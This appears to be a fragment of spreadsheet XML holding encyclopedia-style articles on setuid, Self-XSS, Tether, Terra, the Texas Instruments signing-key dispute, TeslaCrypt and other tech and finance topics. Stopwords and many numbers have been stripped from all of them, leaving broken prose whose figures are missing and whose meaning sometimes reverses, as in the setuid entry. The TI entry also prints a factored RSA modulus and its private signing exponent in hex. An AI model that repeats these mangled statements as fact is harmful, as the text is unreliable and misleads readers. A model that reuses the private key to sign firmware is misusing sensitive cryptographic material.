executed xiang li's email accounts, revealed illegal transactions april 2008 august 2010. january 2013, federal district court delaware accepted li's guilty plea count conspiracy commit criminal copyright infringement conspiracy commit wire fraud, exposing maximum years incarceration.in june 2013, court held sentencing hearing. contended software piracy "prevalent" china, opining "[p]robably million people china things illegally software." u.s. government agreed cyber theft prevalent china, contended prevalence chinese piracy defense, pointed court report estimating china's illegal software market reached billion 2011, total market nearly billion, thus setting piracy rate percent. government emphasized advanced nature software sold fact many software products military applications.the court noted extensive amount crime defendant engaged finding: "this nothing less crime spree, brazen." court found software "highly sophisticated" "ended individuals sometimes countries authorized software materials". court sentenced years prison, longest criminal copyright sentence ever imposed. xiang case featured series declassified. american customers sold software worth $600,000 ronald best, “chief scientist” u.s. defense contractor involved applications radio communication, radar, microwave technology. best used cracked software design components patriot missiles radar marine (the president's helicopter) army's blackhawk helicopter.another u.s. customer cosburn wedderburn, purchased $1,000,000 stolen software. time, wedderburn nasa engineer. references</t>
  </si>
  <si>
    <t>Setuid</t>
  </si>
  <si>
    <t>unix access rights flags setuid setgid (short user identity group identity) allow users executable file system permissions executable's owner group respectively change behaviour directories. they often used allow users computer system programs temporarily elevated privileges order perform specific task. while assumed user group privileges provided always elevated, minimum specific. flags setuid setgid needed tasks require different privileges user normally granted, ability alter system files databases change login password. some tasks require additional privileges immediately obvious, though, ping command, must send listen control packets network interface. file modes setuid setgid bits normally represented values setuid setgid high-order octal digit file mode. example, 6711 setuid setgid bits set, also file read/write/executable owner (7), executable group (first others (second most implementations symbolic representation bits; previous example, could u=rwx,go=x,ug+s. typically, chmod recursive mode restricted directories, modifying existing directory tree must done manually, command find /path/to/directory -type -exec chmod '{}' '\'. effects setuid setgid flags different effects, depending whether applied file, directory binary executable binary executable file. setuid setgid flags effect binary executable files scripts (e.g., bash, perl, python). when executable file when setuid setgid attributes executable file, users able execute file automatically execute file privileges file's owner (commonly root) and/or file's group, depending upon flags set. this allows system designer permit trusted programs user would otherwise allowed execute. these always obvious. example, ping command need access networking privileges normal user cannot access; therefore given setuid flag ensure user needs ping another system even account required privilege sending packets. security impact security purposes, invoking user usually prohibited system altering process way, using ptrace, ld_library_path sending signals exploit raised privilege, although signals terminal still accepted. while setuid feature useful many cases, improper pose security risk setuid attribute assigned executable programs carefully designed. potential security issues, many operating systems ignore setuid attribute applied executable shell scripts. presence setuid executables explains chroot system call available non-root users unix. limitations chroot details. when directory setting setgid permission directory causes files subdirectories created within inherit group ownership, rather primary group file-creating process. created subdirectories also inherit setgid bit. policy applied creation and, thus, prospectively. directories files existing setgid applied unaffected, directories files moved directory set. thus granted capacity work files amongst group users without explicitly setting permissions, limited security model expectation existing files permissions implicitly change. setuid permission directory ignored unix linux systems. however freebsd configured interpret setuid manner similar setgid, case forces files sub-directories created directory owned directory's owner simple form inheritance. this generally needed systems derived bsd, since default directories treated setgid always set, regardless actual value. stated open(2), "when file created given group directory contains it." examples checking permissions permissions file checked octal form and/or alphabetic form command line tool stat suid 4701 executable file owned 'root' group 'root' user named 'thompson' attempts execute file. executable permission users (the '1') 'thompson' execute file. file owner 'root' suid permission (the '4') file executed 'root'. reason executable would 'root' modify specific files user would normally allowed without giving user full root access. default seen /usr/bin/passwd binary file. /usr/bin/passwd needs modify /etc/passwd /etc/shadow store account information password hashes users, modified user 'root'. owner process user running executable file owner executable file sgid 2770 directory named 'music' owned user 'root' group 'engineers' user named 'torvalds' belongs primarily group 'torvalds' secondarily group 'engineers' makes directory named 'electronic' directory named 'music'. group ownership directory named 'electronic' inherits 'engineers.' this making file named 'imagine.txt' without sgid group ownership directory/file would 'torvalds' primary group user 'torvalds'. sticky 1770 directory named 'videogames' owned user 'torvalds' group 'engineers'. user named 'torvalds' creates file named 'tekken' directory named 'videogames'. user named 'wozniak', also part group 'engineers', attempts delete file named 'tekken' cannot, since owner. without sticky bit, 'wozniak' could deleted file, directory named 'videogames' allows read write 'engineers'. default seen /tmp folder. sticky sgid 3171 directory named 'blog' owned group 'engineers' user 'root' user named 'torvalds' belongs primarily group 'torvalds' secondarily group 'engineers' creates file directory named 'thoughts' inside directory 'blog'. user named 'wozniak' also belongs group 'engineers' cannot delete, rename, move file directory named 'thoughts', owner sticky set. however, 'thoughts' file, 'wozniak' edit sticky final decision. sticky sgid set, user 'wozniak' could rename, move, delete file named 'thoughts' directory named 'blog' allows read write group, wozniak belongs group, default 0002 umask allows files edited group. sticky sgid could combined something read-only umask append attribute. security developers design implement programs executables carefully order avoid security vulnerabilities including buffer overruns path injection. successful buffer-overrun attacks vulnerable applications allow attacker execute arbitrary code rights process exploited. event vulnerable process uses setuid root, code execute root privileges, effect giving attacker root access system vulnerable process running. particular importance case setuid process environment process. environment properly sanitized privileged process, behavior changed unprivileged process started example, libc point vulnerable exploit using setuid environment variable allowed executing code untrusted shared libraries. history setuid invented dennis ritchie included employer, bell telephone laboratories, applied patent 1972; patent granted 1979 patent number 4135240 "protection data file contents". patent later placed public domain. also references external links chen, hao; wagner, david; dean, drew; setuid demystified (pdf) tsafrir, dan; silva, dilma; wagner, david; murky issue changing process identity: revising setuid demystified (pdf) pollock, wayne; unix file directory permissions modes</t>
  </si>
  <si>
    <t>Self-XSS</t>
  </si>
  <si>
    <t>self-xss (self cross-site scripting) social engineering attack used gain control victims' accounts. self-xss attack, victim attack unknowingly runs malicious code browser, thus exposing personal information attacker, kind vulnerability known cross-site scripting. overview self-xss operates tricking users also copying pasting malicious content browsers' developer console. usually, attacker posts message says copying running certain code, user able receive virtual rewards hack website. fact, code allows attacker hijack victim's account. history mitigation past, similar attack took place, users tricked pasting malicious javascript address bar. when browser vendors stopped preventing easily running javascript address bar, attackers started using self-xss current form. browser vendors sites taken steps mitigate attack. firefox google chrome begun implementing safeguards warn users self-xss attacks. facebook others display warning message users open developer console, link pages explaining attack detail. etymology "self" part name comes fact user attacking themselves. "xss" part name comes abbreviation cross-site scripting, attacks result malicious code running legitimate site. however, attacks much else common, attack website (which users cannot protect fixed site operator making site secure), whereas self-xss social engineering attack user (against savvy users protect site operator cannot prevent). references further reading mccaney, kevin (november 2011). ways avoid exploit facebook spam attack". gcn. 1105 public sector media group. retrieved september 2014.</t>
  </si>
  <si>
    <t>Tether (cryptocurrency)</t>
  </si>
  <si>
    <t>tether (often referred currency codes, usd₮), asset-backed cryptocurrency stablecoin. launched company tether limited inc. 2014. tether limited owned hong kong-based company ifinex inc., also owns bitfinex cryptocurrency exchange. july 2022, tether limited minted usdt stablecoin protocols blockchains. tether described stablecoin originally designed valued $1.00, tether limited maintaining $1.00 asset reserves usdt issued. history creation 2012, j.r. willett published whitepaper described possibility building cryptocurrencies bitcoin blockchain. willett went help implement idea cryptocurrency mastercoin, associated mastercoin foundation (later renamed omni foundation) promote "second layer". mastercoin protocol became technological foundation tether cryptocurrency, original members mastercoin foundation. brock pierce, became co-founder tether. tether founder, craig sellars, became mastercoin foundation.the precursor tether, originally named "realcoin", announced july 2014 co-founders brock pierce, reeve collins, craig sellars santa monica based startup. first tokens issued october 2014, bitcoin blockchain. this done using omni layer protocol. november 2014, tether reeve collins announced project renamed "tether". company also announced entering private beta, supported "tether+ token" three currencies: ustether (us+) united states dollars, eurotether (eu+) euros yentether (jp+) japanese yen. tether said "every tether+ token backed 100% original currency, redeemed time exposure exchange risk." company's website states incorporated hong kong offices switzerland, without giving details. 2015–2016 january 2015, cryptocurrency exchange bitfinex enabled trading tether platform. while representatives tether bitfinex separate, paradise papers leaks november 2017 named bitfinex officials philip potter giancarlo devasini responsible setting tether holdings limited british virgin islands 2014. spokesperson bitfinex tether said firms ludovicus velde. according tether's website, hong kong-based tether limited fully owned subsidiary tether holdings limited. bitfinex largest bitcoin exchanges volume world.for while, tether processing dollar transactions taiwanese banks which, turn, sent money bank wells fargo allow funds move outside taiwan. tether announced april 2017, international transfers blocked. along bitfinex, tether filed suit wells fargo u.s. district court northern district california. lawsuit withdrawn week later.tether issues tokens bitcoin (omni liquid protocol), ethereum, eos, tron, algorand, -omg network blockchains.currently, total five distinct tether tokens: united states dollar tether bitcoin's omni layer, euro tether bitcoin's omni layer, united states dollar tether erc-20 token, euro tether erc-20 token, added 2020 united states dollar tether trc-20 token tron network. 2017–2018 from january 2017 september 2018, amount tethers outstanding grew million $2.8 billion. early 2018 tether accounted trading volume bitcoin, summer 2018 accounted bitcoin volume. research suggests price manipulation scheme involving tether accounted half price increase bitcoin late 2017. more $500 million tether issued august 2018.on october 2018 tether price briefly fell $0.88 perceived credit risk traders bitfinex exchanged tether bitcoin, driving price bitcoin. 2019–present 2019, tether surpassed bitcoin trading volume highest daily monthly trading volume cryptocurrency market. alleged price manipulation academic research research griffin shams found bitcoin prices increased tether minted usd₮ market downturns. they speculated attempt market manipulation. these findings contested bitfinex cryptocurrency exchange claimed authors cherry-picked data lacked complete dataset. subsequent researchers found little evidence tether usd₮ minting events influenced bitcoin prices, supporting bitfinex critique. 2022, research found bitcoin prices increased whale alert tweeted public tether minted usdt, supporting classic investor response news announcements. academic research following griffin shams study conclude tether manipulated bitcoin. tether bitfinex commented academic debate: "bitfinex tether ever, engaged sort market price manipulation. tether issuances cannot used prop price bitcoin coin/token bitfinex." media research bloomberg news reporters found irregularities kraken cryptocurrency exchange, small market orders moving market price tether much larger market orders 2018 june 2018. york university professor rosa abrantes-metz federal reserve bank examiner mark williams suggested unusual order sizes indicative wash trading automated trading programs. kraken cryptocurrency exchange offered rebuttal claims, stating bloomberg news misunderstood concept stablecoin market price tether greatly influenced market order size tether stablecoin pegged united states dollar. user responsible unusual order sizes also confirmed oddly specific order sizes decimal places "randomly selected." kraken cryptocurrency exchange rebuttal bloomberg news findings later supported academic research concerning stability stablecoins. legal research november 2018, bloomberg reported u.s. federal prosecutors investigating whether tether used manipulate price bitcoin.according tether's website tether newly issued, purchase dollars, redeemed exchanges qualified corporate customers excluding u.s.-based customers. journalist evans states able find publicly verifiable examples purchase newly issued tether redemption year ending august 2018. security liquidity tether claims intends hold united states dollars reserve meet customer withdrawals upon demand. unable meet withdrawal requests 2017. tether purports make reserve account holdings transparent external audit; however, tether never produced audit showing purported reserve. january 2018 tether announced longer relationship auditor.about million usdt tokens stolen tether november 2017. later analysis bitcoin distributed ledger showed close connection tether hack january 2015 hack bitstamp. response theft, tether suspended trading, stated would roll software implement emergency "hard fork" order render tokens tether identified stolen heist untradeable. tether stated december 2017, re-enabled limited cryptocurrency wallet services begun processing backlog pending trades. questions dollar reserves online critic goes name "bitfinex'ed" raised questions relationship bitfinex tether 2017, accusing bitfinex creating "magic tethers thin air". september 2017, tether published memorandum public accounting firm tether limited claimed showed tethers fully backed dollars; however, according york times, independent attorney lewis cohen stated document, careful phrased, prove tether coins backed dollars. documents also fail ascertain whether balances question otherwise encumbered. accounting firm specifically stated this information intended solely assist management tether limited intended used relied upon party. tether failed present audits showing amount tethers outstanding backed one-to-one u.s. dollars deposit despite repeated claims would. june 2018 attempt audit posted website june 2018 showed report firm freeh, sporkin sullivan (fss) appeared confirm issued tethers fully backed dollars. however, stated "fss accounting firm perform review confirmations using generally accepted accounting principles," "the confirmation bank tether balances construed results audit conducted accordance generally accepted auditing standards." stuart hoegner, tether's general counsel said "the bottom line audit cannot obtained. four firms anathema level risk. we’ve gone think next best thing." legal cases york attorney general's case against ifinex april 2019, york attorney general letitia james (prosecution) filed lawsuit ifinex (defendant)—the parent company tether limited bitfinex cryptocurrency exchange. prosecution claimed bitfinex cryptocurrency exchange unable secure reliable fiat banking relationship, entrusted billion panamanian payment processing firm crypto capital corp. prosecution alleged funds co-mingled corporate client deposits contract ever signed crypto capital. prosecution speculated crypto capital corp lost stolen money, executives bitfinex tether limited unable recover $850 million funds. prosecution accused ifinex, bitfinex, tether limited using tether limited cover shortfall.on april 2019, ifinex contested claims funds lost stolen crypto capital corp, stating funds actually seized bitfinex sought release funds. crypto capital corp told bitfinex seizures temporary presented excuses funds could released bitfinex (case point 33). crypto capital corp stated that: 2018, government poland frozen crypto capital corp bank account holding least $340 million bitfinex funds (case point 33); april july 2018, crypto capital corp account portugal containing around $150 million bitfinex funds also frozen (case point 34). principals crypto capital corp later arrested. during case, ifinex contested claims tether limited used cover alleged losses, stating bitfinex borrowed $400 million tether limited inability access seized funds crypto capital corp (case point 38). bitfinex stated fully repaid loans interest tether limited february 2021.on 2021, york supreme court judge joel cohen granted ifinex's motion modify injunction york attorney general's office's accusations general lacked specificity, stating prosecution's case "couched exceedingly sweeping terms" "injunctions must specific." february 2021, ifinex settled legal dispute york attorney general's office. ifinex, bitfinex, tether limited admit wrongdoing paid $18.5 million settle case. u.s. commodity futures trading commission (cftc) december 2017, u.s. commodity futures trading commission (prosecution) issued subpoenas bitfinex tether limited concerning backing minted usd₮. before february 2019, tether limited's terms claimed "every tether always backed 1-to-1, traditional currency held reserves. usdt always equivalent usd." after february 2019, tether limited revised terms accurately state "tether tokens 100% backed tether’s reserves" defined "traditional currency cash equivalents and, time time, include assets receivables loans made tether third parties, include affiliated entities."on april 2019, ifinex (defendant)—the parent company tether limited bitfinex cryptocurrency exchange—issued affidavit stating minted usd₮ backed narrow definition cash cash equivalents, remaining backed assets.on october 2021, tether limited paid fine $41.6 million inaccurately claiming minted usd₮ 100% backed fiat usd, actually 100% backed combination fiat assets "unsecured receivables, commercial papers, funds held third parties, non-fiat assets". tether limited responded revising claims state "all tether tokens pegged 1-to-1 matching fiat currency backed 100% tether’s reserves." tether limited released assurance reports 2017 2022 attesting 100% backing minted usd₮. 2021, tether published report showing 2.9% tether backed fiat usd, 49.6% backed commercial paper, remaining amount backed assets. also stablecoin coin (usdc) (dai) dollar (usdp) gemini dollar (gusd) references external links official website</t>
  </si>
  <si>
    <t>Texas Instruments signing key controversy</t>
  </si>
  <si>
    <t>texas instruments signing controversy resulted texas instruments' (ti) response project factorize 512-bit cryptographic keys needed write custom firmware devices. project july 2009, benjamin moody, united-ti forum user, published factors 512-bit used sign ti-83+ series graphing calculator. discovery private would allow users flash operating systems onto device without special software. moody used free implementations general number field sieve, msieve ggnfs; computation took days dual-core processor. this demonstrates progress hardware development: factorization similar 512-bit rsa-155 1999 using algorithm required large dedicated research group, 8000 mips-years computing time, cray c916 supercomputer.in response, members wider graphing calculators community yaronet) boinc-based distributed computing project, lattice siever (rsals short), quickly factored keys. lattice siever remained active nearly three years outliving initial purpose, factoring integers mathematical community. after factoring integers, rsals moved rsals-inspired nfs@home august 2012. legal response texas instruments began sending initial digital millennium copyright (dmca) take-down requests hackers, referring sites forum posts controlled. hackers responded removing keys, without consulting attorney. sent dmca notices variety websites displaying keys, including united-ti, reddit, wikipedia. texas instruments' efforts became subject streisand effect, keys mirrored number sites, including wikileaks. september 2009, goodin register alerted electronic frontier foundation (eff) ti's actions, agreed take case bono, representing three people received dmca notices. october 2009, sent letter warning posting keys violate dmca, might liable misrepresentation. despite letter eff, continued send dmca notices websites posted keys, stopped late 2009. filed dmca section counter-notice behalf three bloggers received dmca notices. when receive response deadline, bloggers reposted content taken down. cryptographic keys public parameters original ti-83+ ti-83+ silver edition signing factored benjamin moody following 512-bit modulus public encryption) exponent (specified hexadecimal): 82ef4009ed7cac2a5ee12b5f8e8ad9a0ab9cc9f4f3e44b7e8bf2d57a2f2beace83424e1cff0d2a5a7e2e53cb926d61f347dfaa4b35b205b5881ceb40b328e58f factoring moody obtained factors (252 bits) (260 bits), used turn quickly compute 512-bit private decryption) exponent (p−1)(q−1): b709d3a0cd2fec08eafccf540d8a100bb38e5e091d646adb7b14d021096ffcd b7207bd184e0b5a0b89832aa68849b29edfb03fba2e8917b176504f08a96246cb 4d0534ba8bb2bfa0740bfb6562e843c7ec7a58ae351ce11d43438ca239dd99276cd125febaee5d2696579fa3a3958ff4fc54c685eaa91723bc8888f292947ba1 value used sign arbitrary software. keys factored lattice siever (the ti-92+, ti-73, ti-89, voyage 200, ti-89 titanium, ti-84+ ti-84 silver edition signing date-stamp signing keys) similar different values single date-stamp signing shared models. also aacs encryption controversy decss illegal number references external links suppressed texas instruments cryptographic signing keys, 2009 wayback machine (archived june 2010) internet archive. file wayback machine (archived june 2010).</t>
  </si>
  <si>
    <t>Teledyne FLIR</t>
  </si>
  <si>
    <t>teledyne flir acronym "forward-looking infrared"), subsidiary teledyne technologies, specializes design production thermal imaging cameras sensors. main customers governments 2020, approximately revenues federal government united states agencies. operations flir produces devices following markets: surveillance reconnaissance force protection border maritime patrol critical infrastructure protection search rescue detection targeting airborne enforcement drug interdiction facilities company offices, manufacturing, and/or research development facilities nashua, hampshire; goleta, california; north billerica, massachusetts; orlando, florida; bozeman, montana; stillwater, oklahoma; arlington county, virginia; chelmsford, massachusetts; ventura, california; elkridge, maryland; freeport, pennsylvania; ridge, tennessee; waterloo, ontario; west lafayette, indiana; tallinn; täby; dubai; hvalstad; fareham. products flir flir camera limited frames second united states regulatory concerns. camera used detect water leaks. available add-on android devices. an/pvs-22 an/pvs-22, designated universal night sight (uns) clip-on night vision sight built flir's milsight scope. used engage long-range targets handle recoil .50bmg. an/pvs-22 originally co-designed knight's armament company osti inc. socom. ownership tradename "universal night sight" fought osti. uncertain flir came rights an/pvs-22 milsight design. history company founded 1978 pioneer development high-performance, low-cost infrared (thermal) imaging systems airborne uses.originally based tigard, oregon, company relocated portland, oregon, mid-1990s. 1990, company acquired industrial infrared imaging group hughes aircraft company.in june 1993, company became public company initial public offering, raising million.in january 1998, company acquired agema infrared system sweden approximately million.in january 1999, kenneth stringer named president company.in april 1999, company acquired inframetrics.in 2000, stringer fired board directors errors company's accounting practices, earl lewis replaced stringer president company, pricewaterhousecoopers dismissed auditor. january 2001, flir agreed million settle class-action shareholder litigation flir settled u.s. securities exchange commission october 2002. three executives charged fraudulent accounting.in 2004, company acquired building wilsonville, oregon, mentor graphics $10.3 million headquarters.in january 2004, flir acquired indigo systems, developer supplier infrared imaging products, including cooled uncooled infrared detectors, camera cores, finished cameras, $190 million. 2011, losing trade secrets claim founders indigo systems, flir agreed million settle countersuit.beginning 2005, company began supplying imaging technology vehicles.in march 2007, company reported would restate financial statements period 1995 2005 options backdating. flir sued investors options backdating lawsuits thrown november 2007.in october 2007, company acquired extech instruments million.in april 2008, company acquired ifara tecnologias spain €7.0 million.in december 2009, sold extech data systems, division extech made portable printers.also december 2009, company acquired security hardware maker directed perception million.in 2010, company acquired bankrupt raymarine $180 million.in december 2012, company acquired lorex technology million. lorex sold dahua technology 2018 million.in 2013, andrew teich appointed president retirement earl lewis.in april 2015, company paid $9.5 million settle allegations violations foreign corrupt practices paid world tour saudi arabian officials. according u.s. securities exchange commission, flir earned million profits sales influenced fcpa violations.in november 2015, company acquired dvtel, provider software hardware technologies advanced video surveillance, approximately million cash.in february 2016, company's technology used bullitt group caterpillar inc. mobile phone uses lightweight thermal imaging technology.in november 2016, flir acquired point grey research, owner brickstream brand camera products, $259 million.in december 2016, flir acquired prox dynamics, makers black hornet nano, nano-drone used military enforcement surveillance reconnaissance, $134 million.in 2017, cannon appointed president company.in january 2019, company acquired aeryon labs $200 million.in march 2019, company acquired endeavor robotics, former irobot division responsible unmanned ground vehicles (ugvs) global military, public safety, critical infrastructure markets, $382 million cash. company also opened second headquarters arlington county, virginia.in october 2019, company acquired patents related tethered drones, connected ground cable stay aloft much longer drones powered batteries, aria insights.in april 2020, covid-19 pandemic, company released thermal camera used identify elevated skin temperature. demand products surged, putting stress company's supply chain.in january 2021, teledyne technologies announced entered definitive agreement acquire company billion, flir's 2019 revenue $1.9 billion. acquisition completed 2021. also list companies based oregon references external links official website</t>
  </si>
  <si>
    <t>Testnet</t>
  </si>
  <si>
    <t>blockchain technology, testnet instance blockchain powered newer version underlying software, used testing experimentation without risk real funds main chain. testnet coins separate distinct official (mainnet) coins, value, obtained freely faucets. testnets reset time. testnet applications testing applications versions blockchain software developing applications without risk losing real funds analyzing blockchain data smaller scale compared public network providing early access blockchain official release regtest bitcoin core software also default configuration another network called regtest (regression test), also started command line parameter bitcoind -regtest -daemon bitcoin server starting.it added bitcoin core version 0.9.0 released march 2014 created alternative test mode. this network used create blockchains characteristics testnet, nodes user wants. that mode possible create private blockchains operate fully controlled environment. references</t>
  </si>
  <si>
    <t>TeslaCrypt</t>
  </si>
  <si>
    <t>teslacrypt ransomware trojan. defunct, master released developers. early forms, teslacrypt targeted game-play data specific computer games. newer variants malware also affect file types. original, game-player campaign, upon infection malware searched file extensions related different games, include call duty series, world warcraft, minecraft world tanks, encrypted files. files targeted involve save data, player profiles, custom maps game mods stored victim's hard drives. newer variants teslacrypt focused computer games alone also encrypted word, pdf, jpeg files. cases, victim would prompted ransom $500 worth bitcoins order obtain decrypt files.although resembling cryptolocker form function, teslacrypt shares code cryptolocker developed independently. malware infected computers angler adobe flash exploit.even though ransomware claimed teslacrypt used asymmetric encryption, researchers cisco's talos group found symmetric encryption used developed decryption tool this "deficiency" changed version 2.0, rendering impossible decrypt files affected teslacrypt-2.0.by november 2015, security researchers kaspersky quietly circulating weakness version 2.0, carefully keeping knowledge away malware developer could flaw. january 2016, version discovered fixed flaw.a full behavior report, shows behaviorgraphs executiongraphs published joesecurity. shut 2016, developers teslacrypt shut ransomware released master decryption key, thus bringing ransomware. after days, eset released public tool decrypt affected computers charge. references</t>
  </si>
  <si>
    <t>Zapier</t>
  </si>
  <si>
    <t>zapier product allows users integrate applications automate workflows. company fully remote. 2021, connects 4,000 apps, free paid plans. overview zapier provides workflows automate applications together. often described translator apis, helping increase worker productivity saving time automation recurring tasks, business processes lead management. through interface users workflow rules determine automations function, orchestrates flow data tools online services otherwise communicate another. example, business lead added google sheets spreadsheet, lead automatically entered salesforce assigned sales representative. additional team members alerted slack team lead receive email notification lead contacted. history zapier founded columbia, missouri wade foster, bryan helmig, mike knoop, part first startup weekend columbia 2011. after initially submitting application winter 2012 funding cycle rejected, built initial prototype apps, accepted combinator startup seed accelerator summer 2012 funding cycle. result acceptance, company temporarily relocated mountain view, california spring 2012. october year, zapier received $1.3 million seed funding round global venture investment firm bessemer venture partners, venture capital funding date. zapier reached profitability 2014. sequoia capital steadfast financial bought shares company's original investors january 2021, raising zapier's valuation billion. highest valued companies come combinator program, brought $140 million annually recurring revenue january 2021.in march 2017, company offered "de-location package", consisting $10,000 moving reimbursement employees desired move away francisco area. after announcement, applications increased 50%. zapier fully remote company since founded 2011. january 2022, company employs approximately people countries.in 2020, covid-19 pandemic spread, zapier million small business assistance fund struggling customers. 2020, zapier announced national no-code day, launched no-code competition $25,000 cash prize.in 2020, fintech company brex announced partnership zapier, allowing easy workflow automation products. acquisitions march 2021, company acquired makerpad, no-code education service community, undisclosed amount. also ifttt power automate references</t>
  </si>
  <si>
    <t>Terra (blockchain)</t>
  </si>
  <si>
    <t>terra blockchain protocol payment platform used algorithmic stablecoins. project created 2018 terraform labs, startup co-founded kwon daniel shin. known terra stablecoin associated luna reserve asset cryptocurrency. 2022, terra blockchain temporarily halted collapse stablecoin terrausd (ust) luna, event wiped almost billion market capitalisation within week. design terra blockchain leverages fiat-pegged stablecoins power payment system. consensus terra blockchain uses proof-of-stake codesign. several stablecoins built atop terra protocol, including terrausd, third largest stablecoin market capitalisation collapse 2022. terra blockchain fully functional ecosystem dapps anchor mirror utilised stable-coin infrastructure terra.terra group algorithmic stablecoins, named according currencies pegged—for example, terrausd (ust) pegged u.s. dollar. luna serves primary backing asset terra, also used governance token users vote terra community proposals. stablecoins backed u.s. dollars; instead, designed maintain complex model called "burn mint equilibrium". this method uses two-token system, whereby token supposed remain stable (ust) token (luna) meant absorb volatility.the anchor protocol lending borrowing protocol built terra chain. investors deposited anchor protocol receiving 19.45% yield paid terra's reserves. high-yielding mechanism anchor protocol, critics raised concerns kwon's stablecoin model could function like "ginormous ponzi scheme". mirror protocol another project based terra chain, designed offered financial derivatives virtually "mirrored" actual listed stocks. history 2018, kwon daniel shin (also known shin hyun-sung) co-founded terraform labs seoul, south korea. 2019, terraform labs launched first cryptocurrency token. terraform labs raised $200 million investment firms arrington capital, coinbase ventures, galaxy digital lightspeed venture partners.in january 2022, luna foundation guard (lfg) established non-profit based singapore, kwon serving director. terraform labs allocated portion money obtained sales luna foundation guard, used reserves stabilise price ust. may, broke peg, held reserves 80,394 bitcoin worth approximately $2.4 billion. bitcoin largest portion reserve assets, though also held reserves various stablecoins cryptocurrencies.in february 2022, terra washington nationals major league baseball team announced entered sponsorship agreement provided stadium television branding, well rebranding washington nationals club lounge "terra club". deal originally proposed terra community kwon, referring unnamed "sports franchise four major american professional sports leagues", community agreed $38.15 million five-year-long exclusive partnership.the founders kwon shin owned share terraform labs, giving founder controlling power. kwon later enlarged stock pool eleven shares, giving approximately 91.7% ownership shin remaining 8.3%. shin chai corporation, terra-ecosystem payment service company founded, announced 2022 shin longer held ownership stock terraform labs. however, revealed sources singaporean account corporate regulatory authority shin still held 8.3% terraform labs ownership, chai corporation announced shin able "finish liquidating remaining ownership time" despite share ownership may. documents singaporean authority also revealed may, shin held 51.2% ownership kwon 22.4% chai holdings, parent company chai corporation. collapse beginning 2022, tokens made headlines began break dollar. over next week, price plunged cents, luna fell "virtually zero", all-time high $119.51. before crash, luna largest cryptocurrencies market. collapse wiped almost billion market capitalisation course week.on may, terraform labs temporarily halted terra blockchain response falling prices luna. despite company's attempts stabilise luna bitcoin cryptocurrency reserves luna foundation guard, materialise. 2022, blockchain analysts claim usage bitcoin reserves still remains largely uncertain.likely causes collapse included mass withdrawals anchor protocol days collapse, investor concerns cryptocurrencies generally, drop price bitcoin. during collapse, holders converted terra luna mint-and-burn system, caused price luna collapse increased supply. this turn destabilised balancing mechanism currencies.on may, proposal approved reissue luna cryptocurrency decouple abandon devalued stablecoin. original blockchain called terra classic, original luna token called luna classic. luna coin called "terra 2.0" investors, lost valuation opening days listed exchanges. licensing regulatory issues terraform labs pte. ltd., company behind terra, incorporated singapore submit application licence payment services according straits times. also notified entity, meaning granted temporary exemption holding licence monetary authority singapore. according documents filed kwon supreme court korea's registry office, kwon filed dissolve company's korean entity april 2022, granted approval 2022.the u.s. securities exchange commission (sec) issued subpoena terraform labs kwon 2021, specific regard terraform labs' mirror protocol, designed offered financial derivatives virtually "mirrored" actual listed stocks. kwon responded stating comply demands, instead would suing sec. despite kwon's attempts dispute avoid investigations sec, u.s. court hearing manhattan february 2022 ruled favour sec's right continue investigation kwon terraform labs.on may, newly appointed korean minister justice, dong-hoon, enlarged economic crimes investigation division seoul southern district prosecutor’s office, vowing “track illegal funds capital transfers, crack evasion, audit company finances, compile transaction data, seize proceeds criminal financial activity.” first operation, financial securities crimes joint investigation team singled luna terra crisis first investigation target.a class action, patterson terraform labs ltd. filed terraform labs others united states district court northern district california june 2022.in june 2022, yonhap news reported people, including former terraform developers anchor lending protocol, imposed travel restrictions korean government. references external links anchor protocol whitepaper</t>
  </si>
  <si>
    <t>Rublon</t>
  </si>
  <si>
    <t>rublon two-factor authentication system acts additional security layer protects password-based login process applications. protected account accessed someone enters correct password scans code using rublon mobile app, holds digital identity account's owner. browsers previously defined trusted, password needed order sign protected account supported application. mobile accounts protected installing rublon mobile app, available smartphones android, blackberry windows phone. also used define trusted browsers make possible sign using password only. activated providing email address, results creation user's digital identity using asymmetric cryptographic keys. supported applications rublon protects accounts applications integrated system. there plugins magento, prestashop wordpress, allowing administrators websites based platforms integrate without programming. application developers java sdks integrate rublon services. references external links official rublon website rublon developers official developer portal</t>
  </si>
  <si>
    <t>TimeTrax</t>
  </si>
  <si>
    <t>timetrax software hardware platform time trax technologies corp. allows audio recording satellite radio, internet streaming traditional radio broadcasts. company best known disruptive innovation leading role played transformation business model music industry. original software created scott maclean time shift satellite radio programming using pc-connected satellite radio—doing recording audio format, saving songs individual files, named tagged artist song name. now, timetrax technology "de-aggregates" radio-like broadcast reassembles content, customized user. words, records individual songs radio, saves song individual files allows user build music library. although initially encouraged third-party application development radio, publishing links third-party applications site, discontinued radio release timetrax. publicly stated discontinuation previously planned product end-of-life, however several sources within later confirmed withdrawal product mounting pressure riaa emergence timetrax. after withdrawal popularity timetrax, used radios started selling online much $300. acquisition time trax acquired time trax technologies corporation delaware corporation) september 2004, company expanded product offering include hardware functioned direct radio, well sirius connect radio. they also included functionality operate online streaming audio system. company registered numerous patents, although much debate validity patent system, simplicity. 2006 (consumer electronics show), time trax announced demonstrated product, traxcatcher. traxcatcher resembled 'clock radio' dock portable player. functioned much like satellite radio product, radio 'line in'. this demonstrated depth company's claims technology radio provide data stream song name artist (which provides timing 'cuts'). according media product, seemed function company claimed (today, despite commitment company, appears product made available sale). while receiving extensive press media attention visible consumer software hardware products, company also developed business well international partnership included sharing technologies company sweden called popcatcher. after stories featuring maclean timetrax appeared york times, today, syndicated articles, timetrax became facto standard time shifting satellite radio. time trax's elliott frutkin visible critic entertainment industry provoked riaa press release titles "will time trax product launch rattle riaa, again?" time trax also involved grokster supreme court case, insofar filed 'amicus curiae' brief. 2006 events july 2006, address timetrax home page redirecting radio corporate site. this created significant confusion speculation timetrax either acquired radio forced shut down. time, alleged representative time trax asked satelliteguys.us shut forum hosted company. after questioning authenticity contact, forum restored short time later provide information time trax customers well wait official confirmation time trax. july 2006, satelliteguys.us posted details interview time trax's elliott frutkin. although unable speak details issue, confirmed timetrax longer consumer market, although current plans disable technology infrastructure allow continued individual consumers. frutkin hinted several possibilities company considering software, included turning registration servers third party, releasing patch would stop timetrax looking server, distribute software either freeware open source. since then, timetrax website restored original operation, hosts previous versions timetrax software. information made available regarding viability company, confirmation whether still operation. november 2006, satelliteguys.us closed time trax forum lack current information company. current status (2017) timetrax software made available download 2008 along hardware adapter downloading creation purposes. servers upon timetrax software relied shut 2013, point operations ceased. references</t>
  </si>
  <si>
    <t>Self-service password reset</t>
  </si>
  <si>
